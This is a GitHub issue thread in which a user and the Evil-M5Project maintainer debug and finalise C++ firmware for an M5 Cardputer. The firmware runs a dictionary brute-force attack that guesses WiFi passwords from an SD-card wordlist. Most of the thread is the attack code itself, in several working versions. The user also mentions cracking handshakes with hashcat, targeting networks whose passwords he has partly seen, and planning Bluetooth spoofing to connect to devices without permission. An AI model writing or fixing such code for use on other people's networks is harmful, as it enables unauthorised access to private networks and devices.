7h30th3r0n3/Evil-M5Project #70: New App

jayuserdrugaabuser, 2025-03-04:
iv been working on this like crazy this will be my first app ever. its a dic attack for wifi i can get it to compile but the loop logic isnt working right it will try and connect using the first word in my list then quits is there any way you coud take a look at it and maybe help me understand my flaws cuz im so proud of what i did do so far but iv been at this hole codeing thing about 1year and self taught you can have all the credit if you could make it work and just explain were iv messed up i just wanna learn and know so bad thank you for your time (just copy &past in your ide ad it will compile the bin )

void BruteforceAttack(int networkIndex) { 
  Serial.println("Running WiFi Hack Attack...");

  // Ensure a network is selected
  if (WiFi.SSID(networkIndex).isEmpty()) {
    Serial.println("No network selected. Please select a network.");
    waitAndReturnToMenu("No network selected.");
    return;
  }
  
  // Declare targetSSID locally using the selected network's SSID.
  String targetSSID = WiFi.SSID(networkIndex);
  String password_list_file = "/passlist.txt";  // Path to the password list file
  String bruteForcedPassword;                   // Store the brute-forced password
  String bssid;                                 // Store the SSID of the target network
  String BfoundPassword;                        // Store the found password

  // Set WiFi to station mode
  WiFi.mode(WIFI_STA);

  // If already connected, ask whether to disconnect
  if (WiFi.localIP().toString() != "0.0.0.0") {
    if (confirmPopup("You are already connected. Disconnect to start WiFi Attack?")) {
      Serial.println("Disconnecting from current WiFi...");
      WiFi.disconnect(true);
      waitAndReturnToMenu("Disconnected");
      return;
    } else {
      waitAndReturnToMenu("WiFi Attack cancelled (still connected).");
      return;
    }
  }
  
  // If the network is open, no brute force is necessary.
  if (getWifiSecurity(networkIndex) == "Open") {
    Serial.println("Network is open; brute attack not required.");
    waitAndReturnToMenu("Network is open, no password needed.");
    return;
  }

  // Show additional WiFi details before starting the attack
  //showWifiDetails(networkIndex);

  // Display header and a Stop button on the screen
  M5.Display.clear();
  M5.Display.setCursor(0, 0);
  M5.Display.println("WiFi Attack Running...");
  M5.Display.setCursor(0, 20);
  M5.Display.println("Target: " + targetSSID);
  
  // Draw Stop button at the bottom of the screen
  M5.Display.fillRect(0, M5.Display.height() -25, M5.Display.width(), 30, TFT_GREEN);
  M5.Display.setCursor(M5.Display.width() / 2 - 20, M5.Display.height() - 25);
  M5.Display.setTextColor(TFT_CYAN, TFT_GREEN);
  M5.Display.println("Stop Hacking");
  M5.Display.setTextColor(TFT_CYAN, TFT_BLACK);
  M5.Display.display();
  delay(50); // Short delay to ensure display updates

  // Open the password wordlist file from SD
  File file = SD.open(password_list_file.c_str(), "r");
  if (!file) {
    Serial.println("Failed to open password file");
    M5.Display.setCursor(0, 40);
    M5.Display.println("Password file error!");
    M5.Display.display();
    delay(50); // Short delay to ensure display updates
    delay(2000);
    return;
  }

  // Variables for tracking attempts and debounce timing
  int attemptCount = 0;
  const int debounceDelay = 215;
  unsigned long lastDebounceTimeLoop = millis();
  bool isBruteForceRunning = true;
  bool connected = false;

  // Reset the local BfoundPassword variable at the start of the attack
  BfoundPassword = "";

  // Main brute force loop – iterate over each password in the file until a password is found or the user stops the attack.
  while (isBruteForceRunning && file.available()) {
    unsigned long currentMillis = millis();

    // Update input (keyboard) state
    M5.update();

    // Check for a Stop command (using the Enter key with debounce)
    if (M5Cardputer.Keyboard.isKeyPressed(KEY_ENTER) && (currentMillis - lastDebounceTimeLoop > debounceDelay)) {
      isBruteForceRunning = false;
      break;
    }

    // Read the next password from the file and trim whitespace
    String trialPassword = file.readStringUntil('\n');
    trialPassword.trim();
    if (trialPassword.length() == 0) continue;

    attemptCount++;
    Serial.printf("Attempt %d: Trying password: %s\n", attemptCount, trialPassword.c_str());

    // Update display with the current attempt and password being tried
    M5.Display.fillRect(0, 35, M5.Display.width(), 30, TFT_BLACK);
    M5.Display.setCursor(0, 25);
    M5.Display.printf("Attempt: %d", attemptCount);
    M5.Display.setCursor(0, 35);
    M5.Display.print("Trying: " + trialPassword);
    M5.Display.display();
    delay(50); // Short delay to ensure display updates

    // Attempt connection using the current password trial with a timeout loop.
    WiFi.begin(targetSSID.c_str(), trialPassword.c_str());
    unsigned long startAttemptTime = millis();
    bool attemptSuccess = false;

    while (millis() - startAttemptTime < 4500) { // timeout for each connection attempt
      if (WiFi.status() == WL_CONNECTED) {
        attemptSuccess = true;
        break;
      }
      // Update display to show connection attempt status
      M5.Display.fillRect(0, 70, M5.Display.width(), 35, TFT_BLACK);
      M5.Display.setCursor(0, 65);
      M5.Display.print("Connecting...");
      M5.Display.display();
      delay(50); // Short delay to ensure display updates
      delay(500);
      Serial.println("Waiting for connection...");
    }

    if (attemptSuccess) {
      connected = true;
      BfoundPassword = trialPassword; // Store the password found by brute force
      bruteForcedPassword = trialPassword; // Save the discovered WiFi password for future use
      bssid = targetSSID; // Save the network 
      Serial.printf("[SUCCESS] Password found: %s\n", trialPassword.c_str());
      waitAndReturnToMenu("Connected to WiFi: " + targetSSID);
      break;
    } else {
      Serial.printf("[FAILED] %s\n", trialPassword.c_str());
    }

    delay(110); // Small delay between attempts for stability
  }

  file.close();

  // Display final status on the screen
  M5.Display.fillRect(0, 90, M5.Display.width(), 25, TFT_BLACK);
  M5.Display.setCursor(0, 90);
  if (BfoundPassword.length() > 0) {
    M5.Display.print("Found: " + BfoundPassword);
  } else {
    M5.Display.print("WiFi Attack Stopped");
  }
  M5.Display.display();
  delay(50); // Short delay to ensure display updates

  // Return to your main menu
}

7h30th3r0n3, 2025-03-07:
maybe try this ( not tested ): 

`void BruteforceAttack(int networkIndex) {
    static bool wifiInitialized = false;
    if (!wifiInitialized) {
        Serial.println("Initializing WiFi...");
        wifi_init_config_t cfg = WIFI_INIT_CONFIG_DEFAULT();
        if (esp_wifi_init(&cfg) != ESP_OK) {
            Serial.println("WiFi initialization failed");
            esp_wifi_deinit(); // Release resources on failure
            return;
        }
        wifiInitialized = true;
    }

    Serial.println("Running WiFi Attack...");

    if (WiFi.SSID(networkIndex).isEmpty()) {
        Serial.println("No network selected. Please select a network.");
        waitAndReturnToMenu("No network selected.");
        return;
    }

    String targetSSID = WiFi.SSID(networkIndex);
    String password_list_file = "/passlist.txt";
    String foundPassword = "";
    WiFi.mode(WIFI_STA);

    if (WiFi.localIP().toString() != "0.0.0.0") {
        if (confirmPopup("You are already connected. Disconnect to start Attack?")) {
            Serial.println("Disconnecting current WiFi...");
            WiFi.disconnect(true);
            waitAndReturnToMenu("Disconnected");
            return;
        } else {
            waitAndReturnToMenu("Attack cancelled (still connected). ");
            return;
        }
    }

    if (getWifiSecurity(networkIndex) == "Open") {
        Serial.println("Network is open; brute attack not required.");
        waitAndReturnToMenu("Network is open, no password needed.");
        return;
    }

    M5.Display.clear();
    M5.Display.setCursor(0, 0);
    M5.Display.println("Attack Running...");
    M5.Display.setCursor(0, 30);
    M5.Display.println("Target: " + targetSSID);
    M5.Display.display();
    delay(50);

    File file = SD.open(password_list_file.c_str(), "r");
    if (!file) {
        Serial.println("Failed to open password file");
        M5.Display.println("Password file error!");
        M5.Display.display();
        delay(2000);
        return;
    }

    int attemptCount = 0;
    bool isBruteForceRunning = true;
    bool connected = false;

    while (isBruteForceRunning && file.available()) {
        String trialPassword = file.readStringUntil('\n');
        trialPassword.trim();
        if (trialPassword.length() == 0) continue;

        attemptCount++;
        Serial.printf("Attempt %d: Trying password: %s\n", attemptCount, trialPassword.c_str());

        if (attemptCount % 5 == 0) { // Reduce excessive display updates
            M5.Display.fillRect(0, 60, M5.Display.width(), 40, TFT_BLACK);
        }
        M5.Display.setCursor(0, 40);
        M5.Display.printf("Attempt: %d", attemptCount);
        M5.Display.setCursor(0, 50);
        M5.Display.print("Trying: " + trialPassword);
        M5.Display.display();
        delay(50);

        WiFi.disconnect(true); // Ensure previous connection is cleared
        WiFi.begin(targetSSID.c_str(), trialPassword.c_str());
        unsigned long startAttemptTime = millis();
        bool attemptSuccess = false;

        while (millis() - startAttemptTime < 5000) { // Extend timeout for better connection chances
            if (WiFi.status() == WL_CONNECTED) {
                attemptSuccess = true;
                break;
            }
            delay(500);
        }

        if (attemptSuccess) {
            connected = true;
            foundPassword = trialPassword;
            Serial.printf("[SUCCESS] Password found: %s\n", trialPassword.c_str());
            waitAndReturnToMenu("Connected to WiFi: " + targetSSID);
            break;
        } else {
            Serial.printf("[FAILED] %s\n", trialPassword.c_str());
            WiFi.disconnect(true);
        }
        delay(500);
    }

    file.close();

    M5.Display.fillRect(0, 90, M5.Display.width(), 25, TFT_BLACK);
    M5.Display.setCursor(0, 90);
    if (foundPassword.length() > 0) {
        M5.Display.print("JACKPOT: " + foundPassword);
    } else {
        M5.Display.print("Attack Stopped");
    }
    M5.Display.display();
}`

in other hand it's probably more probable to crack the password instead of testing it, like if you check one by one, each 3750ms, 3000 password it can take a lot of time, the total time required is:  

Total time = Number of attempts × Time per attempt
Total time = 3,000 × 3.75 sec = 11,250 sec
11,250 sec ÷ 60 = 187.5 minutes ≈ 3.13 hours

It will take approximately 3 hours and 8 minutes to exhaust the dictionary.  
So it take 24Hours to pass a 23040 dictionnary.

To bruteforce a network with 8 length only number, you have 100,000,000 possibilities, which can take :
Minutes :
375,000,000÷60=6,250,000 min
Hours :
6,250,000÷60=104,167 hours
Days:
104,167÷24=4,340 days
years:
4,340÷365≈11.9 years

and most of network have more than 8 length password and with more than only number. So it's more about lottery in this way while cracking Handshakes is already luck.

jayuserdrugaabuser, 2025-03-08:
thank you for the reply and I understand  I use hashcat running 3 rx 570gpus and one vega FE i can crack a 8 char pass word in 20 hrs with my old eth miner turned passcracker lol but this dictionary attack was my first hand at code and my word list is for net works i sorta have seen part of these passwords or have a slight idea of what i think they could be so it helps save on the powerbill cuz my old amd 6300fx is power hungry and HOT as hell so my girl friend an new baby hate it when i use it and i live were it already 115F all summer....this is my updated ver so far im gunna try yours as well for some reason it tries 1 pass then quits then ill try again and it shows probe sniffing attack then i back out try again and it trys the bruteforce again

void BruteforceAttack(int networkIndex) { 
    Serial.println("Running WiFi Attack...");

    // Ensure a network is selected
    if (WiFi.SSID(networkIndex).isEmpty()) {
        Serial.println("No network selected.");
        waitAndReturnToMenu("No network selected.");
        return;
    }
    
    // Initialize WiFi using ESP-IDF functions in STA mode.
    wifi_init_config_t cfg = WIFI_INIT_CONFIG_DEFAULT();
    if (esp_wifi_init(&cfg) != ESP_OK) {
         Serial.println("WiFi initialization failed");
         return;
    }
    if (esp_wifi_set_mode(WIFI_MODE_STA) != ESP_OK) {
         Serial.println("Failed to set WiFi mode to STA");
         return;
    }
    if (esp_wifi_start() != ESP_OK) {
         Serial.println("Failed to start WiFi");
         return;
    }
    
    // Declare locales.
    String targetSSID = WiFi.SSID(networkIndex);
    String password_list_file = "/passlist.txt";  // Path to the password list file
    String foundPassword = "";  // Consolidated variable for storing discovered WiFi password
    String bssid;              // For storing the BSSID (MAC address)

    // Automatic disconnect: if connected, disconnect automatically.
    if (WiFi.status() == WL_CONNECTED) {
        Serial.println("Disconnecting from current network...");
        WiFi.disconnect(true);
        delay(500);
    }
    
    // If the network is open, no brute force is required.
    if (getWifiSecurity(networkIndex) == "Open") {
        Serial.println("Network is open; brute attack not required.");
        waitAndReturnToMenu("Network is open, no password needed.");
        return;
    }
    
    // Display header and a Stop button on the screen
    M5.Display.clear();
    M5.Display.setCursor(0, 0);
    M5.Display.println("Attack Running...");
    M5.Display.setCursor(0, 30);
    M5.Display.println("Target: " + targetSSID);
    M5.Display.fillRect(0, M5.Display.height() - 30, M5.Display.width(), 20, TFT_NAVY);
    M5.Display.setCursor(M5.Display.width() / 2 - 30, M5.Display.height() - 35);
    M5.Display.setTextColor(TFT_GOLD, TFT_NAVY);
    M5.Display.println("STOP");
    M5.Display.setTextColor(TFT_GOLD, TFT_BLACK);
    M5.Display.display();
    delay(50); // Ensure display updates

    // Open the password wordlist file from SD
    File file = SD.open(password_list_file.c_str(), "r");
    if (!file) {
        Serial.println("Failed to open password file");
        M5.Display.setCursor(0, 35);
        M5.Display.println("Password file error!");
        M5.Display.display();
        delay(50);
        delay(2000);
[... 73 lines cut ...]
        } else {
            Serial.printf("[FAILED] %s\n", trialPassword.c_str());
            WiFi.disconnect(true);
            delay(100);
        }

        // Adaptive Timing: Use a randomized retry delay instead of a fixed delay.
        int retryDelay = random(100, 500);
        Serial.printf("Retrying in %d ms...\n", retryDelay);
        delay(retryDelay);
    }

    file.close();

    // Display final status on the screen
    M5.Display.fillRect(0, 90, M5.Display.width(), 25, TFT_BLACK);
    M5.Display.setCursor(0, 90);
    if (foundPassword.length() > 0) {
        M5.Display.print("JACKPOT: " + foundPassword);
    } else {
        M5.Display.print("Attack Stopped");
    }
    M5.Display.display();
    delay(50);
}

jayuserdrugaabuser, 2025-03-10:
yours worked i finaly see where i messed up thank you so much on to then next project lol a bluetooth mac spoof with a mass connect if i can fish bluetooths i dont need premission to connect to them a second time then port flippers bad ble app over to cardputer and you see what im thinking

jayuserdrugaabuser, 2025-03-10:
i got all the bugs out works perfect now. feel free to add it by all means you helped me out a ton thank you 

void BruteforceAttack(int networkIndex) {
    static bool wifiInitialized = false;
    if (!wifiInitialized) {
        Serial.println("Initializing WiFi...");
        wifi_init_config_t cfg = WIFI_INIT_CONFIG_DEFAULT();
        if (esp_wifi_init(&cfg) != ESP_OK) {
            Serial.println("WiFi initialization failed");
            esp_wifi_deinit(); // Release resources on failure
            return;
        }
        wifiInitialized = true;
    }
    Serial.println("Running WiFi Attack...");
    if (WiFi.SSID(networkIndex).isEmpty()) {
        Serial.println("No network selected. Please select a network.");
        waitAndReturnToMenu("No network selected.");
        return;
    }

    String targetSSID = WiFi.SSID(networkIndex);
    String password_list_file = "/passlist.txt";
    String foundPassword = "";
    WiFi.mode(WIFI_STA);

    if (WiFi.localIP().toString() != "0.0.0.0") {
        if (confirmPopup("You are already connected. Disconnect to start Attack?")) {
            Serial.println("Disconnecting current WiFi...");
            WiFi.disconnect(true);
            waitAndReturnToMenu("Disconnected");
            return;
        } else {
            waitAndReturnToMenu("Attack cancelled (still connected). ");
            return;
        }
    }

    if (getWifiSecurity(networkIndex) == "Open") {
        Serial.println("Network is open; brute attack not required.");
        waitAndReturnToMenu("Network is open, no password needed.");
        return;
    }

    M5.Display.clear();
    M5.Display.setCursor(0, 0);
    M5.Display.println("Attack Running...");
    M5.Display.setCursor(0, 30);
    M5.Display.println("Target: " + targetSSID);
    M5.Display.display();
    delay(50);

    File file = SD.open(password_list_file.c_str(), "r");
    if (!file) {
        Serial.println("Failed to open password file");
        M5.Display.println("Password file error!");
        M5.Display.display();
        delay(2000);
        return;
    }

    int attemptCount = 0;
    bool isBruteForceRunning = true;
    bool connected = false;

    while (isBruteForceRunning && file.available()) {
        String trialPassword = file.readStringUntil('\n');
        trialPassword.trim();
        if (trialPassword.length() == 0) continue;

        attemptCount++;
        Serial.printf("Attempt %d: Trying password: %s\n", attemptCount, trialPassword.c_str());

        // Clear previous attempt display areas:
        // Clear the attempt count area (y=40, height=20)
        M5.Display.fillRect(0, 40, M5.Display.width(), 20, TFT_BLACK);
        // Clear the trial password area (y=60, height=20)
        M5.Display.fillRect(0, 60, M5.Display.width(), 20, TFT_BLACK);

        // Update display with current attempt information
        M5.Display.setCursor(0, 40);
        M5.Display.printf("Attempt: %d", attemptCount);
        M5.Display.setCursor(0, 60);
        M5.Display.print("Trying: " + trialPassword);
        M5.Display.display();
        delay(50);

        WiFi.disconnect(true); // Clear any previous connection
        WiFi.begin(targetSSID.c_str(), trialPassword.c_str());
        unsigned long startAttemptTime = millis();
        bool attemptSuccess = false;

        while (millis() - startAttemptTime < 5000) { // Allow time for connection attempt
            if (WiFi.status() == WL_CONNECTED) {
                attemptSuccess = true;
                break;
            }
            delay(500);
        }

        if (attemptSuccess) {
            connected = true;
            foundPassword = trialPassword;
            Serial.printf("[SUCCESS] Password found: %s\n", trialPassword.c_str());
            waitAndReturnToMenu("Connected to WiFi: " + targetSSID);
            break;
        } else {
            Serial.printf("[FAILED] %s\n", trialPassword.c_str());
            WiFi.disconnect(true);
        }
        delay(500);
    }

    file.close();

    // Display final status
    M5.Display.fillRect(0, 90, M5.Display.width(), 25, TFT_BLACK);
    M5.Display.setCursor(0, 90);
    if (foundPassword.length() > 0) {
        M5.Display.print("JACKPOT: " + foundPassword);
    } else {
        M5.Display.print("Attack Stopped");
    }
    M5.Display.display();
}